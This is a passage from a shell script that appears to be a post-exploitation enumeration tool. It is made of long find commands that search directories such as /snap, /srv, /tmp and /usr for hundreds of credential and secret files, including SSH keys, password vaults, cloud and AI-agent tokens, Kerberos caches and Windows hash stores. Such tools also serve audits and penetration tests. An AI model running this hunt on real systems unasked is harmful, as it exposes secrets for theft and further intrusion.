-o -name \"*.pub\" -o -name \"passbolt.php\" -o -name \"*.crt\" -o -name \"credentials.xml\" -o -name \".mylogin.cnf\" -o -name \"*.jks\" -o -name \"snyk.config.json\" -o -name \"*.pfx\" -o -name \"*.asc\" -o -name \"glusterfs.key\" -o -name \"authorized_hosts\" -o -name \"psk.txt\" -o -name \"*.vhdx\" -o -name \"sslkeylog.log\" -o -name \"*.ftpconfig\" -o -name \"*.sqlite3\" -o -name \"known_hosts\" -o -name \"cesi.conf\" -o -name \"FreeSSHDservice.ini\" -o -name \"web*.config\" -o -name \"*.pcap\" -o -name \"gitlab.yml\" -o -name \"service_principal_entries.bin\" -o -name \"fat.config\" -o -name \"KeePass.ini\" -o -name \"https-xampp.conf\" -o -name \"*.pgp\" -o -name \"AppEvent.Evt\" -o -name \"server.xml\" -o -name \"my.ini\" -o -name \".flyrc\" -o -name \"log4j-core*.jar\" -o -name \"secrets.yml\" -o -name \"*.timer\" -o -name \"*.keystore\" -o -name \".git\" -o -name \".Xauthority\" -o -name \"kadm5.acl\" -o -name \"access_tokens.json\" -o -name \"SAM\" -o -name \"*vnc*.ini\" -o -name \".roadtools_auth\" -o -name \"debian.cnf\" -o -name \"wcx_ftp.ini\" -o -name \"scheduledtasks.xml\" -o -name \"*.rdg\" -o -name \"sip.conf\" -o -name \"pgadmin4.db\" -o -name \"racoon.conf\" -o -name \".gitconfig\" -o -name \"rpcd\" -o -name \".profile\" -o -name \"authorized_keys\" -o -name \"docker-compose.yml\" -o -name \"*.psk\" -o -name \"glusterfs.ca\" -o -name \"id_dsa*\" -o -name \"hosts.equiv\" -o -name \"*.vmdk\" -o -name \"airflow.cfg\" -o -name \"hostapd.conf\" -o -name \"SYSTEM\" -o -name \"secret.asc\" -o -name \"*vnc*.xml\" -o -name \"autologin.conf\" -o -name \"zabbix_agentd.conf\" -o -name \".bashrc\" -o -name \".recently-used.xbel\" -o -name \"drives.xml\" -o -name \".pypirc\" -o -name \"config.xml\" -o -name \"docker.sock\" -o -name \"iis6.log\" -o -name \"TokenCache.dat\" -o -name \"security.sav\" -o -name \"secrets.ldb\" -o -name \"SecEvent.Evt\" -o -name \"*.cer\" -o -name \"gpg-agent.conf\" -o -name \"pwd.ibd\" -o -name \"*.tf\" -o -name \"*.sqlite\" -o -name \"sysprep.xml\" -o -name \"pagefile.sys\" -o -name \"sysprep.inf\" -o -name \".ldaprc\" -o -name \"rsyncd.conf\" -o -name \"atlantis.db\" -o -name \"access_tokens.db\" -o -name \"ipsec.conf\" -o -name \"snmpd.conf\" -o -name \"ws_ftp.ini\" -o -name \"unattended.xml\" -o -name \"msal_http_cache.bin\" -o -name \"crontab-ui.service\" -o -name \"sites.ini\" -o -name \"https.conf\" -o -name \"jetty-realm.properties\" -o -name \"kibana.y*ml\" -o -name \"datasources.xml\" -o -name \"wsl.exe\" -o -name \"adc.json\" -o -name \"*credential*\" -o -name \"*.vhd\" -o -name \"aliases\" -o -name \"mongod*.conf\" -o -name \"storage.json\" -o -name \"ftp.config\" -o -name \"gitlab.rm\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_SNAP=`eval_bckgrd "find ${ROOT_FOLDER}snap -name \"bitcoin.conf\" -o -name \"ffftp.ini\" -o -name \"smb.conf\" -o -name \"environment\" -o -name \".pgpass\" -o -name \"kcpassword\" -o -name \"backups\" -o -name \"*.swp\" -o -name \"scclient.exe\" -o -name \"database.php\" -o -name \"docker.socket\" -o -name \"*_history*\" -o -name \"webserver_config.py\" -o -name \"apt.conf\" -o -name \"credentials.db\" -o -name \"printers.xml\" -o -name \"mysqld.cnf\" -o -name \"tomcat-users.xml\" -o -name \"setupinfo.bak\" -o -name \"default.sav\" -o -name \"AzureRMContext.json\" -o -name \"sitemanager.xml\" -o -name \"db.php\" -o -name \"storage.php\" -o -name \".htpasswd\" -o -name \"ftp.ini\" -o -name \"winscp.ini\" -o -name \"plum.sqlite\" -o -name \"pgsql.conf\" -o -name \".erlang.cookie\" -o -name \".claude.json\" -o -name \"vault-ssh-helper.hcl\" -o -name \"ConsoleHost_history.txt\" -o -name \"firebase-tools.json\" -o -name \".github\" -o -name \"creds*\" -o -name \"appcmd.exe\" -o -name \"system.sav\" -o -name \"rsyncd.secrets\" -o -name \"*.keyring\" -o -name \"password*.ibd\" -o -name \"msal_token_cache.json\" -o -name \"bash.exe\" -o -name \"config.php\" -o -name \"passwd\" -o -name \"*.kdbx\" -o -name \"Dockerfile\" -o -name \"settings.php\" -o -name \"rocketchat.service\" -o -name \"snyk.json\" -o -name \".credentials.json\" -o -name \"state.vscdb\" -o -name \"sssd.conf\" -o -name \"000-default.conf\" -o -name \"trustdb.gpg\" -o -name \"*.pcapng\" -o -name \"pgadmin*.db\" -o -name \"credentials.tfrc.json\" -o -name \"autologin\" -o -name \"hudson.util.Secret\" -o -name \"NetSetup.log\" -o -name \"recentservers.xml\" -o -name \".rhosts\" -o -name \"influxdb.conf\" -o -name \"*.keytab\" -o -name \"Elastix.conf\" -o -name \"groups.xml\" -o -name \"ntuser.dat\" -o -name \".sudo_as_admin_successful\" -o -name \"redis.conf\" -o -name \"anaconda-ks.cfg\" -o -name \"KeePass.config*\" -o -name \"frakti.sock\" -o -name \".k5login\" -o -name \"crontab.db\" -o -name \"*.viminfo\" -o -name \"php.ini\" -o -name \"azureProfile.json\" -o -name \"gvm-tools.conf\" -o -name \".env*\" -o -name \".msmtprc\" -o -name \"backup\" -o -name \"*.maintenance*\" -o -name \"software.sav\" -o -name \"nginx.conf\" -o -name \"krb5.conf\" -o -name \"keys.log\" -o -name \"passwd.ibd\" -o -name \".secrets.mkey\" -o -name \"protecteduserkey.bin\" -o -name \"unattend.txt\" -o -name \"*.ovpn\" -o -name \"FreePBX.conf\" -o -name \"*.socket\" -o -name \".wgetrc\" -o -name \"*.p12\" -o -name \"Ntds.dit\" -o -name \"postgresql.conf\" -o -name \"*.tfstate\" -o -name \"ipsec.secrets\" -o -name \"pubring.kbx\" -o -name \"state.vscdb.backup\" -o -name \"supervisord.conf\" -o -name \"*.gnupg\" -o -name \"fastcgi_params\" -o -name \"grafana.ini\" -o -name \"crio.sock\" -o -name \"*config*.php\" -o -name \"glusterfs.pem\" -o -name \".mcp.json\" -o -name \"*.key\" -o -name \"mariadb.cnf\" -o -name \"secring.gpg\" -o -name \"unattend.inf\" -o -name \"master.key\" -o -name \"*.pem\" -o -name \"rktlet.sock\" -o -name \"autounattend.xml\" -o -name \"private-keys-v1.d/*.key\" -o -name \"error.log\" -o -name \"legacy_credentials.db\" -o -name \"service_principal_entries.json\" -o -name \"wp-config.php\" -o -name \"amportal.conf\" -o -name \"containerd.sock\" -o -name \"zabbix_server.conf\" -o -name \"mosquitto.conf\" -o -name \"cloud.cfg\" -o -name \".google_authenticator\" -o -name \"my.cnf\" -o -name \"*password*\" -o -name \"dockershim.sock\" -o -name \"*.csr\" -o -name \"vsftpd.conf\" -o -name \"setupinfo\" -o -name \"RDCMan.settings\" -o -name \"id_rsa*\" -o -name \"krb5cc_*\" -o -name \"KeePass.enforced*\" -o -name \"*vnc*.txt\" -o -name \"httpd.conf\" -o -name \"accessTokens.json\" -o -name \".boto\" -o -name \".git-credentials\" -o -name \"index.dat\" -o -name \".plan\" -o -name \"elasticsearch.y*ml\" -o -name \"unattend.xml\" -o -name \"filezilla.xml\" -o -name \"*.service\" -o -name \"msal_token_cache.bin\" -o -name \"*.gpg\" -o -name \"ddclient.conf\" -o -name \"sentry.conf.py\" -o -name \"pg_hba.conf\" -o -name \"software\" -o -name \"*.db\" -o -name \"api_key\" -o -name \".lesshst\" -o -name \"*vnc*.c*nf*\" -o -name \".vault-token\" -o -name \"clouds.config\" -o -name \"access.log\" -o -name \"*.der\" -o -name \"*.pub\" -o -name \"passbolt.php\" -o -name \"*.crt\" -o -name \"credentials.xml\" -o -name \".mylogin.cnf\" -o -name \"*.jks\" -o -name \"snyk.config.json\" -o -name \"*.pfx\" -o -name \"*.asc\" -o -name \"glusterfs.key\" -o -name \"authorized_hosts\" -o -name \"psk.txt\" -o -name \"*.vhdx\" -o -name \"sslkeylog.log\" -o -name \"*.ftpconfig\" -o -name \"*.sqlite3\" -o -name \"known_hosts\" -o -name \"cesi.conf\" -o -name \"FreeSSHDservice.ini\" -o -name \"web*.config\" -o -name \"*.pcap\" -o -name \"gitlab.yml\" -o -name \"service_principal_entries.bin\" -o -name \"fat.config\" -o -name \"KeePass.ini\" -o -name \"https-xampp.conf\" -o -name \"*.pgp\" -o -name \"AppEvent.Evt\" -o -name \"server.xml\" -o -name \"my.ini\" -o -name \".flyrc\" -o -name \"log4j-core*.jar\" -o -name \"secrets.yml\" -o -name \"*.timer\" -o -name \"*.keystore\" -o -name \".git\" -o -name \".Xauthority\" -o -name \"kadm5.acl\" -o -name \"access_tokens.json\" -o -name \"SAM\" -o -name \"*vnc*.ini\" -o -name \".roadtools_auth\" -o -name \"debian.cnf\" -o -name \"wcx_ftp.ini\" -o -name \"scheduledtasks.xml\" -o -name \"*.rdg\" -o -name \"sip.conf\" -o -name \"pgadmin4.db\" -o -name \"racoon.conf\" -o -name \".gitconfig\" -o -name \"rpcd\" -o -name \".profile\" -o -name \"authorized_keys\" -o -name \"docker-compose.yml\" -o -name \"*.psk\" -o -name \"glusterfs.ca\" -o -name \"id_dsa*\" -o -name \"hosts.equiv\" -o -name \"*.vmdk\" -o -name \"airflow.cfg\" -o -name \"hostapd.conf\" -o -name \"SYSTEM\" -o -name \"secret.asc\" -o -name \"*vnc*.xml\" -o -name \"autologin.conf\" -o -name \"zabbix_agentd.conf\" -o -name \".bashrc\" -o -name \".recently-used.xbel\" -o -name \"drives.xml\" -o -name \".pypirc\" -o -name \"config.xml\" -o -name \"docker.sock\" -o -name \"iis6.log\" -o -name \"TokenCache.dat\" -o -name \"security.sav\" -o -name \"secrets.ldb\" -o -name \"SecEvent.Evt\" -o -name \"*.cer\" -o -name \"gpg-agent.conf\" -o -name \"pwd.ibd\" -o -name \"*.tf\" -o -name \"*.sqlite\" -o -name \"sysprep.xml\" -o -name \"pagefile.sys\" -o -name \"sysprep.inf\" -o -name \".ldaprc\" -o -name \"rsyncd.conf\" -o -name \"atlantis.db\" -o -name \"access_tokens.db\" -o -name \"ipsec.conf\" -o -name \"snmpd.conf\" -o -name \"ws_ftp.ini\" -o -name \"unattended.xml\" -o -name \"msal_http_cache.bin\" -o -name \"crontab-ui.service\" -o -name \"sites.ini\" -o -name \"https.conf\" -o -name \"jetty-realm.properties\" -o -name \"kibana.y*ml\" -o -name \"datasources.xml\" -o -name \"wsl.exe\" -o -name \"adc.json\" -o -name \"*credential*\" -o -name \"*.vhd\" -o -name \"aliases\" -o -name \"mongod*.conf\" -o -name \"storage.json\" -o -name \"ftp.config\" -o -name \"gitlab.rm\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_SRV=`eval_bckgrd "find ${ROOT_FOLDER}srv -name \"bitcoin.conf\" -o -name \"ffftp.ini\" -o -name \"smb.conf\" -o -name \"environment\" -o -name \".pgpass\" -o -name \"kcpassword\" -o -name \"backups\" -o -name \"*.swp\" -o -name \"scclient.exe\" -o -name \"database.php\" -o -name \"docker.socket\" -o -name \"*_history*\" -o -name \"webserver_config.py\" -o -name \"apt.conf\" -o -name \"credentials.db\" -o -name \"printers.xml\" -o -name \"mysqld.cnf\" -o -name \"tomcat-users.xml\" -o -name \"setupinfo.bak\" -o -name \"default.sav\" -o -name \"AzureRMContext.json\" -o -name \"sitemanager.xml\" -o -name \"db.php\" -o -name \"storage.php\" -o -name \".htpasswd\" -o -name \"ftp.ini\" -o -name \"winscp.ini\" -o -name \"plum.sqlite\" -o -name \"pgsql.conf\" -o -name \".erlang.cookie\" -o -name \".claude.json\" -o -name \"vault-ssh-helper.hcl\" -o -name \"ConsoleHost_history.txt\" -o -name \"firebase-tools.json\" -o -name \".github\" -o -name \"creds*\" -o -name \"appcmd.exe\" -o -name \"system.sav\" -o -name \"rsyncd.secrets\" -o -name \"*.keyring\" -o -name \"password*.ibd\" -o -name \"msal_token_cache.json\" -o -name \"bash.exe\" -o -name \"config.php\" -o -name \"passwd\" -o -name \"*.kdbx\" -o -name \"Dockerfile\" -o -name \"settings.php\" -o -name \"rocketchat.service\" -o -name \"snyk.json\" -o -name \".credentials.json\" -o -name \"state.vscdb\" -o -name \"sssd.conf\" -o -name \"000-default.conf\" -o -name \"trustdb.gpg\" -o -name \"*.pcapng\" -o -name \"pgadmin*.db\" -o -name \"credentials.tfrc.json\" -o -name \"autologin\" -o -name \"hudson.util.Secret\" -o -name \"NetSetup.log\" -o -name \"recentservers.xml\" -o -name \".rhosts\" -o -name \"influxdb.conf\" -o -name \"*.keytab\" -o -name \"Elastix.conf\" -o -name \"groups.xml\" -o -name \"ntuser.dat\" -o -name \".sudo_as_admin_successful\" -o -name \"redis.conf\" -o -name \"anaconda-ks.cfg\" -o -name \"KeePass.config*\" -o -name \"frakti.sock\" -o -name \".k5login\" -o -name \"crontab.db\" -o -name \"*.viminfo\" -o -name \"php.ini\" -o -name \"azureProfile.json\" -o -name \"gvm-tools.conf\" -o -name \".env*\" -o -name \".msmtprc\" -o -name \"backup\" -o -name \"*.maintenance*\" -o -name \"software.sav\" -o -name \"nginx.conf\" -o -name \"krb5.conf\" -o -name \"keys.log\" -o -name \"passwd.ibd\" -o -name \".secrets.mkey\" -o -name \"protecteduserkey.bin\" -o -name \"unattend.txt\" -o -name \"*.ovpn\" -o -name \"FreePBX.conf\" -o -name \"*.socket\" -o -name \".wgetrc\" -o -name \"*.p12\" -o -name \"Ntds.dit\" -o -name \"postgresql.conf\" -o -name \"*.tfstate\" -o -name \"ipsec.secrets\" -o -name \"pubring.kbx\" -o -name \"state.vscdb.backup\" -o -name \"supervisord.conf\" -o -name \"*.gnupg\" -o -name \"fastcgi_params\" -o -name \"grafana.ini\" -o -name \"crio.sock\" -o -name \"*config*.php\" -o -name \"glusterfs.pem\" -o -name \".mcp.json\" -o -name \"*.key\" -o -name \"mariadb.cnf\" -o -name \"secring.gpg\" -o -name \"unattend.inf\" -o -name \"master.key\" -o -name \"*.pem\" -o -name \"rktlet.sock\" -o -name \"autounattend.xml\" -o -name \"private-keys-v1.d/*.key\" -o -name \"error.log\" -o -name \"legacy_credentials.db\" -o -name \"service_principal_entries.json\" -o -name \"wp-config.php\" -o -name \"amportal.conf\" -o -name \"containerd.sock\" -o -name \"zabbix_server.conf\" -o -name \"mosquitto.conf\" -o -name \"cloud.cfg\" -o -name \".google_authenticator\" -o -name \"my.cnf\" -o -name \"*password*\" -o -name \"dockershim.sock\" -o -name \"*.csr\" -o -name \"vsftpd.conf\" -o -name \"setupinfo\" -o -name \"RDCMan.settings\" -o -name \"id_rsa*\" -o -name \"krb5cc_*\" -o -name \"KeePass.enforced*\" -o -name \"*vnc*.txt\" -o -name \"httpd.conf\" -o -name \"accessTokens.json\" -o -name \".boto\" -o -name \".git-credentials\" -o -name \"index.dat\" -o -name \".plan\" -o -name \"elasticsearch.y*ml\" -o -name \"unattend.xml\" -o -name \"filezilla.xml\" -o -name \"*.service\" -o -name \"msal_token_cache.bin\" -o -name \"*.gpg\" -o -name \"ddclient.conf\" -o -name \"sentry.conf.py\" -o -name \"pg_hba.conf\" -o -name \"software\" -o -name \"*.db\" -o -name \"api_key\" -o -name \".lesshst\" -o -name \"*vnc*.c*nf*\" -o -name \".vault-token\" -o -name \"clouds.config\" -o -name \"access.log\" -o -name \"*.der\" -o -name \"*.pub\" -o -name \"passbolt.php\" -o -name \"*.crt\" -o -name \"credentials.xml\" -o -name \".mylogin.cnf\" -o -name \"*.jks\" -o -name \"snyk.config.json\" -o -name \"*.pfx\" -o -name \"*.asc\" -o -name \"glusterfs.key\" -o -name \"authorized_hosts\" -o -name \"psk.txt\" -o -name \"*.vhdx\" -o -name \"sslkeylog.log\" -o -name \"*.ftpconfig\" -o -name \"*.sqlite3\" -o -name \"known_hosts\" -o -name \"cesi.conf\" -o -name \"FreeSSHDservice.ini\" -o -name \"web*.config\" -o -name \"*.pcap\" -o -name \"gitlab.yml\" -o -name \"service_principal_entries.bin\" -o -name \"fat.config\" -o -name \"KeePass.ini\" -o -name \"https-xampp.conf\" -o -name \"*.pgp\" -o -name \"AppEvent.Evt\" -o -name \"server.xml\" -o -name \"my.ini\" -o -name \".flyrc\" -o -name \"log4j-core*.jar\" -o -name \"secrets.yml\" -o -name \"*.timer\" -o -name \"*.keystore\" -o -name \".git\" -o -name \".Xauthority\" -o -name \"kadm5.acl\" -o -name \"access_tokens.json\" -o -name \"SAM\" -o -name \"*vnc*.ini\" -o -name \".roadtools_auth\" -o -name \"debian.cnf\" -o -name \"wcx_ftp.ini\" -o -name \"scheduledtasks.xml\" -o -name \"*.rdg\" -o -name \"sip.conf\" -o -name \"pgadmin4.db\" -o -name \"racoon.conf\" -o -name \".gitconfig\" -o -name \"rpcd\" -o -name \".profile\" -o -name \"authorized_keys\" -o -name \"docker-compose.yml\" -o -name \"*.psk\" -o -name \"glusterfs.ca\" -o -name \"id_dsa*\" -o -name \"hosts.equiv\" -o -name \"*.vmdk\" -o -name \"airflow.cfg\" -o -name \"hostapd.conf\" -o -name \"SYSTEM\" -o -name \"secret.asc\" -o -name \"*vnc*.xml\" -o -name \"autologin.conf\" -o -name \"zabbix_agentd.conf\" -o -name \".bashrc\" -o -name \".recently-used.xbel\" -o -name \"drives.xml\" -o -name \".pypirc\" -o -name \"config.xml\" -o -name \"docker.sock\" -o -name \"iis6.log\" -o -name \"TokenCache.dat\" -o -name \"security.sav\" -o -name \"secrets.ldb\" -o -name \"SecEvent.Evt\" -o -name \"*.cer\" -o -name \"gpg-agent.conf\" -o -name \"pwd.ibd\" -o -name \"*.tf\" -o -name \"*.sqlite\" -o -name \"sysprep.xml\" -o -name \"pagefile.sys\" -o -name \"sysprep.inf\" -o -name \".ldaprc\" -o -name \"rsyncd.conf\" -o -name \"atlantis.db\" -o -name \"access_tokens.db\" -o -name \"ipsec.conf\" -o -name \"snmpd.conf\" -o -name \"ws_ftp.ini\" -o -name \"unattended.xml\" -o -name \"msal_http_cache.bin\" -o -name \"crontab-ui.service\" -o -name \"sites.ini\" -o -name \"https.conf\" -o -name \"jetty-realm.properties\" -o -name \"kibana.y*ml\" -o -name \"datasources.xml\" -o -name \"wsl.exe\" -o -name \"adc.json\" -o -name \"*credential*\" -o -name \"*.vhd\" -o -name \"aliases\" -o -name \"mongod*.conf\" -o -name \"storage.json\" -o -name \"ftp.config\" -o -name \"gitlab.rm\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_SYS=`eval_bckgrd "find ${ROOT_FOLDER}sys -name \"*.service\" -o -name \"*.timer\" -o -name \"*.socket\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_SYSTEM=`eval_bckgrd "find ${ROOT_FOLDER}system -name \"*.service\" -o -name \"*.timer\" -o -name \"*.socket\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_SYSTEMD=`eval_bckgrd "find ${ROOT_FOLDER}systemd -name \"*.service\" -o -name \"*.timer\" -o -name \"*.socket\" -o -name \"rocketchat.service\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_TMP=`eval_bckgrd "find ${ROOT_FOLDER}tmp -name \"bitcoin.conf\" -o -name \"ffftp.ini\" -o -name \"smb.conf\" -o -name \"environment\" -o -name \".pgpass\" -o -name \"kcpassword\" -o -name \"backups\" -o -name \"*.swp\" -o -name \"scclient.exe\" -o -name \"database.php\" -o -name \"docker.socket\" -o -name \"*_history*\" -o -name \"webserver_config.py\" -o -name \"apt.conf\" -o -name \"credentials.db\" -o -name \"printers.xml\" -o -name \"mysqld.cnf\" -o -name \"tomcat-users.xml\" -o -name \"setupinfo.bak\" -o -name \"default.sav\" -o -name \"AzureRMContext.json\" -o -name \"sitemanager.xml\" -o -name \"db.php\" -o -name \"storage.php\" -o -name \".htpasswd\" -o -name \"ftp.ini\" -o -name \"winscp.ini\" -o -name \"plum.sqlite\" -o -name \"pgsql.conf\" -o -name \".erlang.cookie\" -o -name \".claude.json\" -o -name \"vault-ssh-helper.hcl\" -o -name \"ConsoleHost_history.txt\" -o -name \"firebase-tools.json\" -o -name \".github\" -o -name \"creds*\" -o -name \"appcmd.exe\" -o -name \"system.sav\" -o -name \"rsyncd.secrets\" -o -name \"*.keyring\" -o -name \"password*.ibd\" -o -name \"msal_token_cache.json\" -o -name \"bash.exe\" -o -name \"config.php\" -o -name \"passwd\" -o -name \"*.kdbx\" -o -name \"Dockerfile\" -o -name \"settings.php\" -o -name \"rocketchat.service\" -o -name \"snyk.json\" -o -name \".credentials.json\" -o -name \"state.vscdb\" -o -name \"sssd.conf\" -o -name \"000-default.conf\" -o -name \"trustdb.gpg\" -o -name \"*.pcapng\" -o -name \"pgadmin*.db\" -o -name \"credentials.tfrc.json\" -o -name \"autologin\" -o -name \"hudson.util.Secret\" -o -name \"NetSetup.log\" -o -name \"recentservers.xml\" -o -name \".rhosts\" -o -name \"influxdb.conf\" -o -name \"*.keytab\" -o -name \"Elastix.conf\" -o -name \"groups.xml\" -o -name \"ntuser.dat\" -o -name \".sudo_as_admin_successful\" -o -name \"redis.conf\" -o -name \"anaconda-ks.cfg\" -o -name \"KeePass.config*\" -o -name \"frakti.sock\" -o -name \".k5login\" -o -name \"crontab.db\" -o -name \"*.viminfo\" -o -name \"php.ini\" -o -name \"azureProfile.json\" -o -name \"gvm-tools.conf\" -o -name \".env*\" -o -name \".msmtprc\" -o -name \"backup\" -o -name \"*.maintenance*\" -o -name \"software.sav\" -o -name \"nginx.conf\" -o -name \"krb5.conf\" -o -name \"keys.log\" -o -name \"passwd.ibd\" -o -name \".secrets.mkey\" -o -name \"protecteduserkey.bin\" -o -name \"unattend.txt\" -o -name \"*.ovpn\" -o -name \"FreePBX.conf\" -o -name \"*.socket\" -o -name \".wgetrc\" -o -name \"*.p12\" -o -name \"Ntds.dit\" -o -name \"postgresql.conf\" -o -name \"*.tfstate\" -o -name \"ipsec.secrets\" -o -name \"pubring.kbx\" -o -name \"state.vscdb.backup\" -o -name \"supervisord.conf\" -o -name \"*.gnupg\" -o -name \"fastcgi_params\" -o -name \"grafana.ini\" -o -name \"crio.sock\" -o -name \"*config*.php\" -o -name \"glusterfs.pem\" -o -name \".mcp.json\" -o -name \"*.key\" -o -name \"mariadb.cnf\" -o -name \"secring.gpg\" -o -name \"unattend.inf\" -o -name \"master.key\" -o -name \"*.pem\" -o -name \"rktlet.sock\" -o -name \"autounattend.xml\" -o -name \"private-keys-v1.d/*.key\" -o -name \"error.log\" -o -name \"legacy_credentials.db\" -o -name \"service_principal_entries.json\" -o -name \"wp-config.php\" -o -name \"amportal.conf\" -o -name \"containerd.sock\" -o -name \"zabbix_server.conf\" -o -name \"mosquitto.conf\" -o -name \"cloud.cfg\" -o -name \".google_authenticator\" -o -name \"ssh-agent.sock\" -o -name \"my.cnf\" -o -name \"*password*\" -o -name \"dockershim.sock\" -o -name \"*.csr\" -o -name \"vsftpd.conf\" -o -name \"setupinfo\" -o -name \"RDCMan.settings\" -o -name \"agent.*\" -o -name \"id_rsa*\" -o -name \"krb5cc_*\" -o -name \"sess_*\" -o -name \"KeePass.enforced*\" -o -name \"*vnc*.txt\" -o -name \"httpd.conf\" -o -name \"accessTokens.json\" -o -name \".boto\" -o -name \".git-credentials\" -o -name \"index.dat\" -o -name \".plan\" -o -name \"elasticsearch.y*ml\" -o -name \"unattend.xml\" -o -name \"filezilla.xml\" -o -name \"*.service\" -o -name \"msal_token_cache.bin\" -o -name \"*.gpg\" -o -name \"ddclient.conf\" -o -name \"sentry.conf.py\" -o -name \"pg_hba.conf\" -o -name \"software\" -o -name \"*.db\" -o -name \"api_key\" -o -name \".lesshst\" -o -name \"*vnc*.c*nf*\" -o -name \".vault-token\" -o -name \"clouds.config\" -o -name \"access.log\" -o -name \"*.der\" -o -name \"*.pub\" -o -name \"passbolt.php\" -o -name \"*.crt\" -o -name \"credentials.xml\" -o -name \".mylogin.cnf\" -o -name \"*.jks\" -o -name \"snyk.config.json\" -o -name \"*.pfx\" -o -name \"*.asc\" -o -name \"glusterfs.key\" -o -name \"authorized_hosts\" -o -name \"psk.txt\" -o -name \"*.vhdx\" -o -name \"sslkeylog.log\" -o -name \"*.ftpconfig\" -o -name \"*.sqlite3\" -o -name \"known_hosts\" -o -name \"cesi.conf\" -o -name \"FreeSSHDservice.ini\" -o -name \"web*.config\" -o -name \"*.pcap\" -o -name \"gitlab.yml\" -o -name \"service_principal_entries.bin\" -o -name \"fat.config\" -o -name \"KeePass.ini\" -o -name \"https-xampp.conf\" -o -name \"*.pgp\" -o -name \"AppEvent.Evt\" -o -name \"server.xml\" -o -name \"my.ini\" -o -name \".flyrc\" -o -name \"log4j-core*.jar\" -o -name \"secrets.yml\" -o -name \"*.timer\" -o -name \"*.keystore\" -o -name \".git\" -o -name \".Xauthority\" -o -name \"kadm5.acl\" -o -name \"access_tokens.json\" -o -name \"SAM\" -o -name \"*vnc*.ini\" -o -name \".roadtools_auth\" -o -name \"debian.cnf\" -o -name \"wcx_ftp.ini\" -o -name \"scheduledtasks.xml\" -o -name \"*.rdg\" -o -name \"sip.conf\" -o -name \"pgadmin4.db\" -o -name \"racoon.conf\" -o -name \".gitconfig\" -o -name \"rpcd\" -o -name \".profile\" -o -name \"authorized_keys\" -o -name \"docker-compose.yml\" -o -name \"*.psk\" -o -name \"glusterfs.ca\" -o -name \"id_dsa*\" -o -name \"hosts.equiv\" -o -name \"*.vmdk\" -o -name \"airflow.cfg\" -o -name \"hostapd.conf\" -o -name \"SYSTEM\" -o -name \"secret.asc\" -o -name \"*vnc*.xml\" -o -name \"autologin.conf\" -o -name \"zabbix_agentd.conf\" -o -name \".bashrc\" -o -name \".recently-used.xbel\" -o -name \"drives.xml\" -o -name \".pypirc\" -o -name \"config.xml\" -o -name \"docker.sock\" -o -name \"iis6.log\" -o -name \"TokenCache.dat\" -o -name \"security.sav\" -o -name \"secrets.ldb\" -o -name \"SecEvent.Evt\" -o -name \"*.cer\" -o -name \"gpg-agent.conf\" -o -name \"pwd.ibd\" -o -name \"*.tf\" -o -name \"*.sqlite\" -o -name \"sysprep.xml\" -o -name \"pagefile.sys\" -o -name \"sysprep.inf\" -o -name \".ldaprc\" -o -name \"rsyncd.conf\" -o -name \"atlantis.db\" -o -name \"access_tokens.db\" -o -name \"ipsec.conf\" -o -name \"snmpd.conf\" -o -name \"ws_ftp.ini\" -o -name \"unattended.xml\" -o -name \"msal_http_cache.bin\" -o -name \"crontab-ui.service\" -o -name \"sites.ini\" -o -name \"https.conf\" -o -name \"jetty-realm.properties\" -o -name \"kibana.y*ml\" -o -name \"datasources.xml\" -o -name \"wsl.exe\" -o -name \"adc.json\" -o -name \"*credential*\" -o -name \"*.vhd\" -o -name \"aliases\" -o -name \"mongod*.conf\" -o -name \"storage.json\" -o -name \"ftp.config\" -o -name \"gitlab.rm\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_USR=`eval_bckgrd "find ${ROOT_FOLDER}usr -name \"bitcoin.conf\" -o -name \"ffftp.ini\" -o -name \"smb.conf\" -o -name \"environment\" -o -name \".pgpass\" -o -name \"kcpassword\" -o -name \"backups\" -o -name \"*.swp\" -o -name \"scclient.exe\" -o -name \"database.php\" -o -name \"docker.socket\" -o -name \"*_history*\" -o -name \"webserver_config.py\" -o -name \"apt.conf\" -o -name \"credentials.db\" -o -name \"printers.xml\" -o -name \"mysqld.cnf\" -o -name \"tomcat-users.xml\" -o -name \"setupinfo.bak\" -o -name \"default.sav\" -o -name \"AzureRMContext.json\" -o -name \"sitemanager.xml\" -o -name \"db.php\" -o -name \"storage.php\" -o -name \".htpasswd\" -o -name \"ftp.ini\" -o -name \"winscp.ini\" -o -name \"plum.sqlite\" -o -name \"pgsql.conf\" -o -name \".erlang.cookie\" -o -name \".claude.json\" -o -name \"vault-ssh-helper.hcl\" -o -name \"ConsoleHost_history.txt\" -o -name \"firebase-tools.json\" -o -name \".github\" -o -name \"creds*\" -o -name \"appcmd.exe\" -o -name \"system.sav\" -o -name \"rsyncd.secrets\" -o -name \"*.keyring\" -o -name \"password*.ibd\" -o -name \"msal_token_cache.json\" -o -name \"bash.exe\" -o -name \"config.php\" -o -name \"passwd\" -o -name \"*.kdbx\" -o -name \"Dockerfile\" -o -name \"settings.php\" -o -name \"rocketchat.service\" -o -name \"snyk.json\" -o -name \".credentials.json\" -o -name \"state.vscdb\" -o -name \"sssd.conf\" -o -name \"000-default.conf\" -o -name \"trustdb.gpg\" -o -name \"*.pcapng\" -o -name \"pgadmin*.db\" -o -name \"credentials.tfrc.json\" -o -name \"autologin\" -o -name \"hudson.util.Secret\" -o -name \"NetSetup.log\" -o -name \"recentservers.xml\" -o -name \".rhosts\" -o -name \"influxdb.conf\" -o -name \"*.keytab\" -o -name \"Elastix.conf\" -o -name \"groups.xml\" -o -name \"ntuser.dat\" -o -name \".sudo_as_admin_successful\" -o -name \"redis.conf\" -o -name \"anaconda-ks.cfg\" -o -name \"KeePass.config*\" -o -name \"frakti.sock\" -o -name \".k5login\" -o -name \"crontab.db\" -o -name \"*.viminfo\" -o -name \"php.ini\" -o -name \"azureProfile.json\" -o -name \"gvm-tools.conf\" -o -name \".env*\" -o -name \".msmtprc\" -o -name \"backup\" -o -name \"*.maintenance*\" -o -name \"software.sav\" -o -name \"nginx.conf\" -o -name \"krb5.conf\" -o -name \"keys.log\" -o -name \"passwd.ibd\" -o -name \".secrets.mkey\" -o 